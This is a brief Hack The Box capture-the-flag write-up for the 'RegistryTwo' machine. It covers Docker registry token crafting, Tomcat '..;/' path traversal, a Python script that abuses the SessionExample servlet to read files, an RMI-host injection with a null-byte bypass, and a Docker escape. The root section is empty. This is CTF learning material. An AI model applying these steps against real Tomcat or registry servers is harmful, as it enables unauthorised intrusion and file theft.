🔢RegistryTwo - HTB
https://app.hackthebox.com/machines/552
First of all, I won't go into deep detail for every step. Sometimes I'll skip certain aspects, but my focus will be on delivering the exploit, vulnerability, and how to exploit them efficiently. This will be a quick and concise writeup."
#Foothold
First lets start with port 5001
With fuzzing the web dirs ,we can find /auth
you can refer back to the docker registry documentation HERE for further details
also specifically HERE will tell you what to do with the token ,but first it required more modifications in order to access the docker registry image and pull it.
"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNjkxMTk1MzMwLCJuYmYiOjE2OTExOTQ0MjAsImlhdCI6MTY5MTE5NDQzMCwianRpIjoiNzI2OTY2MzEyOTQ3MjA0MTI5NyIsImFjY2VzcyI6W119.bgtox4TBEcH_MuNR603paF72sKCIguXsBVKQplZDOqiokMqlEuizFpte4vqlfX_oVNwE_3xh4kU1Y7CERUsVzN8JMMbccgTV-95F1TVwnc1hoYe1w-6rSvHINHi-cGurHSirahbpxQy9iTc1VBNawx2m2sLTRQdFe7E-TTHSdaF0OwDYwtALmW2sCNc9quhRPkbi4c0YusJP0UYajt35WWfJnPbWtlDHlVrttsqvjHWEAQn29CpkvrKFrTI78VfzbVcYyZAoTGnWbqgGDtSLPccn7eyVeJlyTsfwY6gcHkuywi6LUEV7pEZ-R28hhQkBu4eb4EuJgcvLJNOciUTTqA"
As per documentation we also need :
Www-Authenticate:
To craft your own token ,we used this added URL scope as the documentation suggest to access _catalog
https://webhosting.htb:5001/auth?service=Docker%20registry&scope=registry:catalog:*
Craft another token to get hosting-app image information
https://webhosting.htb:5001/auth?service=Docker%20registry&scope=repository:hosting-app:pull
Reading the image information will gives you a clue what web app they are using and alot of other information to find your way for the user foothold
Now we move to Port 443
Register with a new user then login
as we know previously they are using tomcat v9.0.2 ,referring to HERE we find that website is vulnerable to Path Traversal (..;/)
Now we are able to access the application manager
Now we are able to access the example scripts which we can modify token sessions to access unavailable things
as you can see (s_EditingMedia_{tmpID}) ,u can get {tmpID} by creating a domain then try to write/edit the file index.html or any created file
i have automated the process by creating this simple python script
import requests
url_post = 'https://www.webhosting.htb/hosting/..;/examples/servlets/servlet/SessionExample'
user_input = input("File PATH: ")
headers_post = {
# Add the required headers here, including the 'Cookie' header
'Cookie': 'JSESSIONID={cookie}',
'Content-Type': 'application/x-www-form-urlencoded',
}
data = {
'dataname': 's_EditingMedia_{tmpID}',
'datavalue': user_input
}
# Disable SSL certificate verification by setting verify=False
response_post = requests.post(url_post, headers=headers_post, data=data, verify=False)
# Check the response status code
if response_post.status_code == 200:
print("Request was successful.")
else:
print(f"Request failed with status code: {response_post.status_code}")
just make sure to change {cookie} + {tmpID} to yours ,after you get successfully respond ,you can refresh the tmpID page to see the file ,also note you are able to modify the file with what ever you want if you have write access to that file.
now we can get the hosting.war that we found in previous docker registry image that we pulled
/usr/local/tomcat/webapps/hosting.war
view the webpage source ,and scroll down to ' value=atob(`{BASE64}`)
try to just get the {base64} and remove the rest ,and use base64 -d to > hosting.war file
after reading the source code ,we know we can set manager role
adding &rmi.host={ip} and %00.htb to bypass the check
now we have to request anything through our created domain to trigger the RMI
i used ermir tool ,and make sure your current java version is 11 in order for the payload and exploit to work, u can use below commands to list/change your java version
update-java-alternatives --list
update-java-alternatives --set java-1.11.0-openjdk-amd64
#Docker Escape
after enumeration ,we can actually interact with the RMI server again to escape the docker
you will find all used tools in my repository
i brute force developer folder using Sec-List/Discovery/Web-Content/dirsearch.txt
and found a hidden file contain credentials
#Root - Privilege Escalation
za
Last updated